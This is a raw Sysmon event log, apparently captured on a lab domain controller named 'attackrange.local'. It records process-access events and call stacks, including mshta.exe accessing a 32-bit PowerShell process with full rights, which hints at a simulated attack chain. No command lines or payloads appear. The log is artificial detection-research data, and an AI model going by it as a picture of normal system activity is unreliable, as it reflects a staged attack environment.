15:59:18.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023344Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023343Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023342Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023341Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023340Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023339Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023338Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023337Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023336Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023731Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.960{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5357-6008-4006-00000000A301}5512C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023730Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.960{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5357-6008-4006-00000000A301}5512C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023729Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.913{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5357-6008-4006-00000000A301}5512C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023728Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.913{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5357-6008-4006-00000000A301}5512C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000023727Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.866{7901BC46-5357-6008-4006-00000000A301}5512C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_mqcicjvm.m0w.ps12021-01-20 15:59:19.866 10341000x800000000000000023726Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.851{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5357-6008-4006-00000000A301}5512C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023725Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.819{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5357-6008-4106-00000000A301}7412C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023724Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.819{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5357-6008-4106-00000000A301}7412C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023723Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.804{7901BC46-5357-6008-4106-00000000A301}74123628C:\Windows\system32\conhost.exe{7901BC46-5357-6008-4006-00000000A301}5512C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023722Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.804{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5357-6008-4106-00000000A301}7412C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023721Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.788{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023720Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.788{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023719Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.788{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023718Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.788{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5357-6008-4006-00000000A301}5512C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023717Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.788{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023716Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.788{7901BC46-5357-6008-3F06-00000000A301}46682832C:\Windows\SysWOW64\mshta.exe{7901BC46-5357-6008-4006-00000000A301}5512C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\System32\windows.storage.dll+1240e6(wow64)|C:\Windows\System32\windows.storage.dll+123da1(wow64)|C:\Windows\System32\windows.storage.dll+123e73(wow64)|C:\Windows\System32\windows.storage.dll+124b45(wow64)|C:\Windows\System32\windows.storage.dll+1239f1(wow64)|C:\Windows\System32\windows.storage.dll+125d40(wow64)|C:\Windows\System32\windows.storage.dll+125fbc(wow64)|C:\Windows\System32\windows.storage.dll+1258a5(wow64)|C:\Windows\System32\shell32.dll+1a82b4(wow64)|C:\Windows\System32\shell32.dll+1a818e(wow64)|C:\Windows\System32\shell32.dll+13be0a(wow64)|C:\Windows\System32\shcore.dll+2fffa(wow64) 154100x800000000000000023715Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.800{7901BC46-5357-6008-4006-00000000A301}5512C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 